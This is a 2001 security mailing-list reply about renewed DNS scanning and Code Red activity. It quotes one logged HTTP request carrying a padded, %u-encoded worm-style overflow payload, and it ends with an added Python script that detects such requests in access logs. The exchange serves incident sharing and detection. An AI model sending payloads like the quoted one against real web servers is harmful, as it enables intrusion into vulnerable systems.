Security Incidents mailing list archives

Re: Resurgence of DNS scanning activity


From: John Kinsella <jlk () thrashyour com>
Date: Thu, 30 Aug 2001 10:52:35 -0700

Yep, the DNS scans are definitely picking back up again.  Code Red or
some variant seems to have woken back up in the last 12 hours or so as
well, plus I just saw this one:

xxx.xxx.xxx.xxx - - [30/Aug/2001:10:04:34 -0700] 
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.1" 400

It's happened more than once, and it's coming from the same IP that's
also doing the normal Code Red thing.

John

On Thu, Aug 30, 2001 at 09:47:47AM -0400, Keith.Morgan wrote:
Is anyone else seeing a resurgence of DNS scans?  Or, for the past month+
have we just been dodging the bullet?  DNS has been really quiet on our
networks for the past couple of months, but over the past two days, we've
seen a 90% increase.  New worm?  Kids back at school?  Just a fluke?

Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morgan () terradon com
304-755-8291 x142


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
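
Added example, not part of the original messages: Python that flags access-log entries shaped like the one John quotes (a long run of one filler character directly followed by %uXXXX words) and groups them by source host, since he notes the request repeats from the same IP. The thresholds, sample lines and addresses are constructed, and each log entry is assumed to sit on a single line.

```python
import re
from collections import defaultdict

# Log prefix as in the post: host ident user [timestamp] "request" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (\d{3})')
# Filler run of one repeated character, directly followed by %uXXXX words.
# Thresholds (64 filler chars, 4 words) are assumptions; tune per site.
PAD_RE = re.compile(r'(.)\1{63,}((?:%u[0-9a-fA-F]{4}){4,})')

def classify(line):
    """Return a finding dict for a padded %u-encoded request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, request, status = m.groups()
    hit = PAD_RE.search(request)
    if not hit:
        return None
    pad_len = len(hit.group(0)) - len(hit.group(2))
    return {"host": host, "time": when, "status": int(status),
            "pad_char": hit.group(1), "pad_len": pad_len,
            "u_words": len(hit.group(2)) // 6}  # each %uXXXX is 6 chars

def scan(lines):
    """Group findings by source host so repeat senders stand out."""
    by_host = defaultdict(list)
    for line in lines:
        finding = classify(line.rstrip("\n"))
        if finding:
            by_host[finding["host"]].append(finding)
    return dict(by_host)

# Constructed sample lines (documentation addresses, shortened payloads).
U = "%u9090%u6858%ucbd3%u7801"
SAMPLE = [
    '192.0.2.10 - - [30/Aug/2001:10:04:34 -0700] "' + "X" * 120 + U * 2 + ' HTTP/1.1" 400',
    '192.0.2.10 - - [30/Aug/2001:10:31:02 -0700] "' + "X" * 120 + U * 2 + '%u00=a HTTP/1.1" 400',
    '192.0.2.77 - - [30/Aug/2001:10:40:11 -0700] "GET /index.html HTTP/1.0" 200',
    '192.0.2.78 - - [30/Aug/2001:10:41:50 -0700] "GET /' + "a" * 200 + ' HTTP/1.0" 404',
    '192.0.2.79 - - [30/Aug/2001:10:42:09 -0700] "GET /?q=%u0041%u0042%u0043%u0044 HTTP/1.0" 200',
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE).items():
        print(host, len(hits), [(h["time"], h["pad_char"], h["pad_len"], h["u_words"]) for h in hits])
```

A long filler run alone or %u-encoded words alone are not flagged; only the combination is, which keeps ordinary long URLs and Unicode-escaped query strings out of the results.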



